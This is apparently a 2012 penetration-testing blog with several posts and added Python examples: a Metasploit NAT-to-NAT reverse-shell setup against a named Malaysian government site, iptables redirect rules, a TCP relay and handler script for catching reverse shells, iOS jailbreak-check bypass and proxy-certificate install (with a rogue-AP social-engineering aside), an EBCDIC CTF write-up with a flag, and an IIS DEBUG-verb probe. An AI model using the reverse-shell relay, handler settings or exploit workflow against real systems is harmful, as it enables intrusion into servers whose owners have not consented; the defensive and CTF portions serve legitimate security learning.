Wednesday, September 5, 2012

Art of Pentesting: NAT-to-NAT attack with Metasploit

As followers of the "the only way to exploit is Metasploit" school, we often run into the situation where the target server sits behind NAT. The usual pentest workaround is to make the exploited server connect back to the attacker machine with a reverse_tcp payload, since nothing on the attacker side can reach an inbound listener on the target.





However, this technique has several weaknesses:

- The attacker needs to have an external (public) IP.
- The attacker is in trouble if they are also in a NAT environment.
- The attacker's network has only a limited set of open ports.

A screwed-up situation.

Solving the issue can be done in two ways:

1. Tinkering with your company policy to allow port forwarding to your internal IP
2. Using an external box with a public IP as a trampoline point into our internal network



We used an external box as our trampoline point. You could install Metasploit on that server itself, but that may violate the blax3 policy, and it consumes a lot of resources.


PoC of the attack


Suppose we found the ColdFusion (CFM) FCKeditor bug on chaah.gov.my; we can deploy the exploit as is.






But the tricky part is the payload settings. On my side I have this type of connection.

My setup:

1. Set up a VPN (or a poor man's VPN) between your internal machine and the external box
2. Redirect traffic for one port on the external box to your own internal VPN IP:port
3. Exploit


Setting up the Metasploit payload..




On your external box you can use iptables to redirect the traffic (192.168.6.14 is our VPN IP on the owned interface):

 iptables -t nat -A PREROUTING  -p tcp --dport 6767 -j DNAT --to-destination 192.168.6.14:6767
 iptables -t nat -A POSTROUTING -p tcp -d 192.168.6.14 --dport 6767 -j MASQUERADE

The second rule, together with net.ipv4.ip_forward=1 on the box (and a FORWARD rule allowing the flow if your FORWARD policy is DROP), is what makes the DNAT actually work: our VPN client's default route does not go through the box, so without source NAT its replies to the victim would leave via our own gateway and the TCP handshake would never complete.




Back to Metasploit, here is the crown jewel: we set ReverseListenerBindAddress to our own VPN IP, while LHOST stays the external box's public IP. LHOST is the address baked into the payload (what the victim connects to), and ReverseListenerBindAddress is where the handler really binds, so the handler listens on the tunnel while the victim talks to the trampoline.
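A user-space alternative to the iptables DNAT rule, as an added example that is not part of the original post: a small TCP trampoline that relays every connection arriving on the box's public port to the VPN IP:port, plus the matching msfconsole resource script showing the LHOST / ReverseListenerBindAddress split. Because the relay terminates TCP on the box, the victim only ever sees the box's public IP and no forwarding or masquerading rules are needed. The addresses, the port and the payload name are assumptions for illustration; the loopback demo stands in for the victim and the handler.

```python
"""Added example (not from the original post): a user-space TCP trampoline for
NAT-to-NAT reverse shells, and the handler settings that go with it."""
import socket
import threading


def pump(src, dst):
    """Copy bytes src -> dst until EOF, then pass the EOF on to dst."""
    try:
        while True:
            data = src.recv(65536)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)  # let the other direction drain and finish
        except OSError:
            pass


class Trampoline:
    """Listen on listen_addr (the box's public side) and relay each connection
    to target_addr (our VPN IP:port where the Metasploit handler is bound)."""

    def __init__(self, listen_addr, target_addr):
        self.target_addr = target_addr
        self.srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.srv.bind(listen_addr)
        self.srv.listen(16)
        self.bound_addr = self.srv.getsockname()
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            try:
                client, _ = self.srv.accept()
            except OSError:  # listener closed
                return
            threading.Thread(target=self._relay, args=(client,), daemon=True).start()

    def _relay(self, client):
        try:
            upstream = socket.create_connection(self.target_addr, timeout=10)
        except OSError:
            client.close()  # handler not up yet: drop the victim, it will retry
            return
        upstream.settimeout(None)
        t1 = threading.Thread(target=pump, args=(client, upstream), daemon=True)
        t2 = threading.Thread(target=pump, args=(upstream, client), daemon=True)
        t1.start(); t2.start(); t1.join(); t2.join()
        client.close(); upstream.close()

    def close(self):
        self.srv.close()


def handler_rc(public_ip, vpn_ip, port, payload="windows/meterpreter/reverse_tcp"):
    """msfconsole resource script for the handler side. LHOST is what the payload
    connects back to (the trampoline box); ReverseListenerBindAddress is where
    the handler really listens (our VPN IP). Payload name is an assumption."""
    return "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {payload}",
        f"set LHOST {public_ip}",
        f"set LPORT {port}",
        f"set ReverseListenerBindAddress {vpn_ip}",
        "exploit -j",
    ])


def demo():
    """Loopback self-test: a constructed 'handler' that upper-cases what it gets,
    reached through the trampoline. Returns what the 'victim' side read back."""
    handler = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    handler.bind(("127.0.0.1", 0))
    handler.listen(1)

    def fake_handler():
        conn, _ = handler.accept()
        with conn:
            conn.sendall(conn.recv(1024).upper())

    threading.Thread(target=fake_handler, daemon=True).start()
    tr = Trampoline(("127.0.0.1", 0), handler.getsockname())
    with socket.create_connection(tr.bound_addr, timeout=5) as victim:
        victim.sendall(b"hello from victim")
        victim.shutdown(socket.SHUT_WR)  # done sending; wait for reply and EOF
        got = b""
        while True:
            chunk = victim.recv(1024)
            if not chunk:
                break
            got += chunk
    tr.close()
    handler.close()
    return got


if __name__ == "__main__":
    print(demo())
    print(handler_rc("203.0.113.10", "192.168.6.14", 6767))
```

On the real box you would run `Trampoline(("0.0.0.0", 6767), ("192.168.6.14", 6767))` and keep it alive for the engagement; redir or socat do the same job if you prefer not to ship Python.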


.... And the ritual begins







Wednesday, August 29, 2012

iOS Application Pentesting Series Part 2: What's inside an IPA?

Apple might be the greatest evil born as a byproduct of the current capitalist system. Love them or loathe them, they are here to stay. And so we continue with part 2, explaining the iOS application architecture. Like packages on major Unix distributions, an iOS application (the compiled files) is archived in the IPA format, which is actually just a zip archive.

There are two ways to obtain the IPA file. If you are the developer, you can get the IPA straight from your own build. Otherwise the only way to obtain a usable IPA is to crack the application itself, since App Store binaries are shipped encrypted. The Hackulo team has written a nice wiki explaining the whole process of decrypting the binary at runtime.


What is the structure of an IPA file? Let's take a look at the Maybank2u app's structure..




As you can see, the common structure of a mobile web application IPA usually consists of:

Payload/

Payload/application.app


and a few plist files. A plist is Apple's property list format: structured key/value data stored either as human-readable XML or in a binary encoding. Info.plist inside the .app directory is the one to read first, since it carries the bundle identifier, the executable name and the minimum iOS version.

So what can we find in an app? A lot of stuff. Suppose we are interested in finding out how an app detects whether the iOS device has been jailbroken. In the Maybank2u app, if we explore the plugins folder:


There's a JavaScript file called CheckRoot. However, it doesn't tell us much about how the checking mechanism actually works. So we fire up IDA and load the app's binary. Take note that the app is compiled as a Mach-O for ARM. In IDA we then look for the native function that corresponds to CheckRoot.



Clicking on the name yields..




The app checks for the existence of each file and returns 1 if it exists. Since we know the app decides the device is jailbroken if any of those files is detected, a jailbroken iPhone can evade the detection simply by hooking the checking function so that every check returns BOOL 0 (NO).

We will discuss that later, in Part 3 or maybe 4..
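A desktop-side look at the IPA layout described above and a model of the CheckRoot logic, as an added example that is not code from the original post or from the app it discusses. An .ipa is a zip archive with the app bundle under Payload/<Name>.app/ and its metadata in Info.plist (XML or binary; plistlib reads both), so a few lines of Python can pull out the bundle id, the executable, its Mach-O magic and any embedded .js plugins. The sample archive, bundle name, plugin path and the list of jailbreak paths are constructed for illustration (the post does not list which files the app probes); the file-existence predicate in `check_root` is injected so the "make every check say no" hook can be shown without a device.

```python
"""Added example (not from the original post): inspect an .ipa offline and model
the CheckRoot-style jailbreak test with a hookable predicate."""
import io
import os
import plistlib
import zipfile

MACHO_MAGIC = {
    b"\xce\xfa\xed\xfe": "Mach-O 32-bit little-endian (ARM, 2012-era iOS)",
    b"\xcf\xfa\xed\xfe": "Mach-O 64-bit little-endian (arm64)",
    b"\xca\xfe\xba\xbe": "Mach-O fat/universal (several slices)",
}


def inspect_ipa(ipa_bytes):
    """Parse the archive: bundle id, executable, binary format, embedded .js
    plugins and whether an App Store code signature directory is present."""
    with zipfile.ZipFile(io.BytesIO(ipa_bytes)) as zf:
        names = zf.namelist()
        apps = sorted({n.split("/")[1] for n in names
                       if n.startswith("Payload/") and n.split("/")[1].endswith(".app")})
        if len(apps) != 1:
            raise ValueError(f"expected exactly one .app under Payload/, found {apps}")
        app = apps[0]
        info = plistlib.loads(zf.read(f"Payload/{app}/Info.plist"))  # XML or binary
        exe = info.get("CFBundleExecutable")
        exe_path = f"Payload/{app}/{exe}"
        binary_format = "missing"
        if exe and exe_path in names:
            binary_format = MACHO_MAGIC.get(zf.read(exe_path)[:4], "unknown")
        return {
            "app": app,
            "bundle_id": info.get("CFBundleIdentifier"),
            "executable": exe,
            "min_os": info.get("MinimumOSVersion"),
            "binary_format": binary_format,
            "plugins": sorted(n for n in names
                              if n.startswith(f"Payload/{app}/") and n.endswith(".js")),
            "code_signature_present": f"Payload/{app}/_CodeSignature/CodeResources" in names,
        }


# Paths commonly probed by jailbreak checks. The post does not list which ones
# the app actually tests, so this list is illustrative only.
JAILBREAK_PATHS = ["/Applications/Cydia.app", "/bin/bash", "/usr/sbin/sshd",
                   "/etc/apt", "/private/var/lib/apt"]


def check_root(exists=os.path.exists, paths=JAILBREAK_PATHS):
    """Mirror of the CheckRoot logic described in the post: 1 if any probed path
    exists, else 0. Hooking the app's file check so it always answers 'no' is
    the same as passing exists=lambda p: False here."""
    return 1 if any(exists(p) for p in paths) else 0


def build_sample_ipa():
    """Constructed sample with the layout from the post (not a real app)."""
    info = {"CFBundleIdentifier": "com.example.bankapp",
            "CFBundleExecutable": "BankApp", "MinimumOSVersion": "5.0"}
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Payload/BankApp.app/Info.plist",
                    plistlib.dumps(info, fmt=plistlib.FMT_BINARY))
        zf.writestr("Payload/BankApp.app/BankApp",
                    b"\xce\xfa\xed\xfe" + b"\0" * 28)  # Mach-O magic only, not a binary
        zf.writestr("Payload/BankApp.app/www/plugins/CheckRoot.js", b"// plugin stub\n")
        zf.writestr("iTunesMetadata.plist", plistlib.dumps({"itemName": "BankApp"}))
    return buf.getvalue()


if __name__ == "__main__":
    for key, value in inspect_ipa(build_sample_ipa()).items():
        print(f"{key:>22}: {value}")
    print("real check:", check_root())
    print("hooked check:", check_root(exists=lambda p: False))
```

On a real archive call `inspect_ipa(open("app.ipa", "rb").read())`; a missing `_CodeSignature` directory usually means you are looking at a cracked or developer build rather than a pristine App Store download.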





Monday, August 27, 2012

iOS Application Pentesting Series: Part 1 (Non-Jailbreak method)..

At SCAN we always find new weird toys to play with. Recently we were assigned to do a penetration test on an iOS mobile application. Now, before we begin: pentesting an iOS mobile application is not the same as jailbreaking the iOS firmware..

While jailbreaking is pretty much focused on exploiting the core applications and the iOS architecture itself, we shift our focus to the iOS application itself: the one that is compiled with Xcode, signed, and pushed out via iTunes or the App Store..

As a note, it is important to test the application on an iOS device itself rather than in the simulator, since code compiled for the simulator is x86 while our iOS device is a baby little ARM.

While Android is famous for its well-known stack diagram, we haven't seen much of how an application sits within the iOS architecture..




Most commercial applications are actually programmed as a precompiled, dedicated browser that accesses their data on a web server; in short, a mobile web application. We say web because it uses HTTP/HTTPS as the transport to exchange resources, for example Maybank2u and GSCMobile.

In a normal web application pentest you would use Paros, ZAP or Burp Suite as your intercepting proxy. However, in an iOS environment the proxy's self-signed certificate is rejected by the iOS application by default! This is because NSURLConnection validates the server certificate against the device's trust store and fails the connection when the chain does not end in a trusted CA. (It's a good feature: it reduces MiTM attacks on an iOS device.)

So how do we solve this dilemma? Simple: just install our self-signed cert (the proxy's CA certificate) onto the iOS device and mark it as trusted...

1. Generate our dynamic SSL certificate with ZAP and save the CA certificate file.


2. Host it on a temporary web server and point Safari on the device at the location where we saved the cert file.



3. In Safari, tapping on our cert leads us to this particular page..






4. Now all your HTTPS iOS apps are belong to us...
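Step 2 in code, as an added example that is not part of the original post: a throwaway web server that hands the proxy's CA certificate to Safari with the MIME type iOS recognises as a certificate (application/x-x509-ca-cert), so that tapping the link opens the profile-install screen instead of rendering PEM text. It also converts a PEM export to DER, which is the form iOS handles most reliably. The certificate bytes below are a constructed DER blob, not a real certificate; the file name `/ca.cer` and port 8000 are assumptions.

```python
"""Added example (not from the original post): serve a CA certificate to an iOS
device so Safari offers to install it."""
import base64
import http.server
import re
import threading
import urllib.request

IOS_CERT_MIME = "application/x-x509-ca-cert"


def pem_to_der(pem):
    """Return the DER bytes of the first CERTIFICATE block in a PEM file."""
    m = re.search(rb"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", pem, re.S)
    if not m:
        raise ValueError("no CERTIFICATE block found")
    return base64.b64decode(b"".join(m.group(1).split()))


class CertHandler(http.server.BaseHTTPRequestHandler):
    """Serves exactly one URL, /ca.cer, with the certificate MIME type."""
    cert_der = b""  # bound per server by serve_cert()

    def do_GET(self):
        if self.path != "/ca.cer":
            self.send_error(404)
            return
        self.send_response(200)
        self.send_header("Content-Type", IOS_CERT_MIME)
        self.send_header("Content-Length", str(len(self.cert_der)))
        self.end_headers()
        self.wfile.write(self.cert_der)

    def log_message(self, *args):  # keep the console quiet
        pass


def serve_cert(pem_bytes, bind=("0.0.0.0", 8000)):
    """Start the server in a background thread and return it (call .shutdown())."""
    handler = type("BoundCertHandler", (CertHandler,), {"cert_der": pem_to_der(pem_bytes)})
    srv = http.server.HTTPServer(bind, handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


# Constructed DER blob (SEQUENCE { INTEGER 1 }) wrapped as PEM. NOT a certificate;
# it only exercises the PEM->DER path and the HTTP headers.
SAMPLE_DER = b"\x30\x03\x02\x01\x01"
SAMPLE_PEM = (b"-----BEGIN CERTIFICATE-----\n"
              + base64.encodebytes(SAMPLE_DER)
              + b"-----END CERTIFICATE-----\n")


def demo():
    """Loopback self-test: fetch /ca.cer and return (content_type, body)."""
    srv = serve_cert(SAMPLE_PEM, bind=("127.0.0.1", 0))
    try:
        url = f"http://127.0.0.1:{srv.server_address[1]}/ca.cer"
        with urllib.request.urlopen(url, timeout=5) as resp:
            return resp.headers.get("Content-Type"), resp.read()
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo())
```

In practice: `serve_cert(open("zap_root_ca.cer", "rb").read())` on the laptop, then browse to http://<laptop-ip>:8000/ca.cer from the phone on the same Wi-Fi and accept the install prompt.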





Note that all of this can be done without jailbreaking your iOS device, and let's keep it that way, since we want to see how secure the application is at its default settings. Two caveats: an app that pins its server certificate will still reject the proxy, and on newer iOS versions (10.3 and later) a root installed this way must additionally be switched on under Settings > General > About > Certificate Trust Settings before anything trusts it.

P/S: You could combine this with a social engineering attack, using a rogue AP that redirects to a landing page forcing the user to install the cert, but that's another topic.

We'll continue with part 2 later.... now that I'm married I'm too lazy to write long posts.



Friday, July 6, 2012

MISTI Johor 2012 CTF Writeup: when in Rome, do in Rome

So once again, the awesome SCAN Associates Berhad, in collaboration with MISTI Johor, organised a quick/mini CTF competition in the southern land of Malaysia, at Pan Pac JB a few weeks ago. I was not able to run the competition on site directly since I was busy with my marriage (oh yeah, marriage is way more important and rewarding in life, if you know what I mean :p).

So I managed to rip off / rewrite the score server in Ruby and harden it, thanks to the power of Apache... In a Malaysian CTF, how do you predict a winner? Simple.. you only have three (okay, four) choices, either

1. UTP *   - that means the alak/kage gang
2. UTM *  - that means the kuey teow gang
3. MMU * - well, what do you expect? It's MMU; there should be plenty of nerds and geeks.
4. UiTM * - urm, yeah, well you know .... they win sometimes, right?


Final Score.





Oh, my BFF hacker/trainer friends asked me to write up one of the questions. Since I'm in a good mood (I'm a husband now), let's go through one question.... Question 7



So what happens when someone actually connects to the port?

You actually get something that looks like gibberish



Since we know it's gibberish, let's analyse the traffic with Wireshark and use Follow TCP Stream.




Hmm... since it's not readable as ASCII, let's try EBCDIC?

Hohoho. To answer the server, we need to write a simple client that encodes our data into EBCDIC before sending and decodes the replies back to ASCII when receiving from the server.

A quick, dirty, inelegant script that works anyway.. in Python
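An equivalent client, as an added example rather than the script from the original post (which is only shown as a screenshot): everything sent is encoded to EBCDIC code page 037 and every reply is decoded back to ASCII, with a small triage helper for deciding from a capture that a "gibberish" stream is EBCDIC in the first place. The echo-style server, its banner and the expected answer are constructed here so the example runs offline; they are not the CTF service, and the flag on this page is not reproduced.

```python
"""Added example (not from the original post): talk to an EBCDIC-speaking
TCP service, plus a quick check for spotting EBCDIC in a capture."""
import socket
import threading

EBCDIC = "cp037"       # IBM EBCDIC US/Canada; if text still looks off, try cp500 or cp1047
EBCDIC_LF = b"\x25"    # line feed in cp037 (what "\n".encode("cp037") gives)


def to_ebcdic(text):
    return text.encode(EBCDIC)


def from_ebcdic(data):
    return data.decode(EBCDIC, errors="replace")


def looks_like_ebcdic(data):
    """Triage for a 'gibberish' stream: EBCDIC letters, digits and space all have
    the high bit set, so ASCII shows few printables while cp037 shows many."""
    if not data:
        return False
    ascii_ok = sum(32 <= b < 127 for b in data) / len(data)
    text = from_ebcdic(data)
    ebcdic_ok = sum(c.isprintable() or c in "\r\n\t" for c in text) / len(text)
    return ebcdic_ok > 0.9 and ascii_ok < 0.5


def recv_line(sock):
    """Read until an EBCDIC line feed or EOF."""
    buf = b""
    while not buf.endswith(EBCDIC_LF):
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf


def talk(host, port, lines, timeout=5.0):
    """Connect, read the banner, then send each line in EBCDIC and collect the
    decoded replies. Returns [banner, reply1, reply2, ...] as ASCII strings."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        replies.append(from_ebcdic(recv_line(s)))
        for line in lines:
            s.sendall(to_ebcdic(line + "\n"))
            replies.append(from_ebcdic(recv_line(s)))
    return replies


def start_fake_server():
    """Constructed EBCDIC-only stand-in: banner question, one answer, one verdict.
    Returns (host, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(to_ebcdic("WHEN IN ROME, DO AS THE...?\n"))
            answer = from_ebcdic(recv_line(conn)).strip()
            conn.sendall(to_ebcdic("CORRECT\n" if answer.upper() == "ROMANS DO" else "WRONG\n"))
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()


def demo():
    host, port = start_fake_server()
    return talk(host, port, ["romans do"])


if __name__ == "__main__":
    for reply in demo():
        print(reply, end="")
```

Against the real box you would call `talk(host, port, ["your answer"])` and read the decoded reply; if the decoded banner still looks wrong, swap `EBCDIC` for another IBM code page before assuming the service is doing something cleverer.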



Now test it!!



So the answer is c6bf8061e6ece9aff707ddaf666db3b50983fd32
Since I'm in a good mood, I'm releasing the source code I used for the server..


http://pastebin.com/dcuTjjtd

Oh, congrats to MMU, biyatch..




Check for the DEBUG verb in IIS

PCI compliance is an asshole of a misleading compliance regime, created by some capitalist junkies to say you're secure!!! ... In my opinion it's full of shit, but yeah, everyone has to comply with it to assure our shareholders or investors that we are secure for digital business, although http://www.technewsworld.com/story/64926.html says otherwise.

Having said that, one of the PCI-C requirements is to disable debug mode on the web server. IIS/ASP.NET does not turn on DEBUG mode by default. But you know developers :)
To test for the DEBUG verb in IIS/ASP.NET you can run a command like this with curl (target is a placeholder for the host; the path can be foo.asp or foo.aspx, though the verb is handled by the ASP.NET runtime, so an .aspx path is the one that actually answers):

curl -H "Command: stop-debug" -X DEBUG http://target/foo.aspx

If it returns an HTTP 200 with the body

OK

then DEBUG is enabled and needs to be turned off. Using stop-debug rather than start-debug is deliberate: the probe then cannot leave a debug session running on the target.

A screenshot example


How to disable DEBUG: http://support.microsoft.com/kb/815157
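The same probe scripted, as an added example that is not part of the original post, so it can be run across a list of hosts: IIS/ASP.NET answers the DEBUG verb with HTTP 200 and a body of "OK" only when debugging is enabled for that application; a 405, 404, 403 or an HTML error page means the verb is not honoured. The mock server is constructed for the self-test and only imitates those two behaviours; it is not real IIS, and the host, port and path in the demo are assumptions.

```python
"""Added example (not from the original post): detect the ASP.NET DEBUG verb."""
import http.client
import http.server
import threading


def check_debug_verb(host, port=80, path="/default.aspx", use_tls=False, timeout=5.0):
    """Send 'DEBUG <path>' with 'Command: stop-debug' (harmless: it starts nothing).
    Returns (debug_enabled, status_code, first bytes of the body)."""
    conn_cls = http.client.HTTPSConnection if use_tls else http.client.HTTPConnection
    conn = conn_cls(host, port, timeout=timeout)
    try:
        conn.request("DEBUG", path, headers={"Command": "stop-debug"})
        resp = conn.getresponse()
        status = resp.status
        body = resp.read(1024).decode("latin-1", "replace")
    finally:
        conn.close()
    enabled = status == 200 and body.strip().upper() == "OK"
    return enabled, status, body


class _MockIIS(http.server.BaseHTTPRequestHandler):
    """Mock: debug_enabled selects which of the two real-world answers to give."""
    debug_enabled = True

    def do_DEBUG(self):  # BaseHTTPRequestHandler dispatches on the verb name
        if self.debug_enabled and self.headers.get("Command") in ("start-debug", "stop-debug"):
            status, body = 200, b"OK"
        else:
            status, body = 405, b"<html><body><h1>405 Method Not Allowed</h1></body></html>"
        self.send_response(status)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass


def demo(enabled=True):
    """Run the probe against the local mock; returns the check_debug_verb tuple."""
    handler = type("MockIIS", (_MockIIS,), {"debug_enabled": enabled})
    srv = http.server.HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        return check_debug_verb("127.0.0.1", srv.server_address[1])
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("debug on :", demo(True))
    print("debug off:", demo(False))
```

For a real scan, loop `check_debug_verb(host, 443, "/some/page.aspx", use_tls=True)` over your scope and report every host where the first element comes back True.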

Monday, July 2, 2012

I'm married.


Married.

Geek stuff that I do during our marriage?






Wednesday, June 13, 2012

rand() facts and forgets.

  • When issuing fork(), the child keeps exactly the parent's memory layout (same addresses, same stack canary). All you need is a memory leak somewhere that exposes a pointer (perhaps the saved ebp?).
  • It doesn't matter whether you issue a print statement in PHP/Perl/Python/Ruby/Java; in the end it always resolves through the PLT into C.
  • Oh, I'm getting married. How cool is that?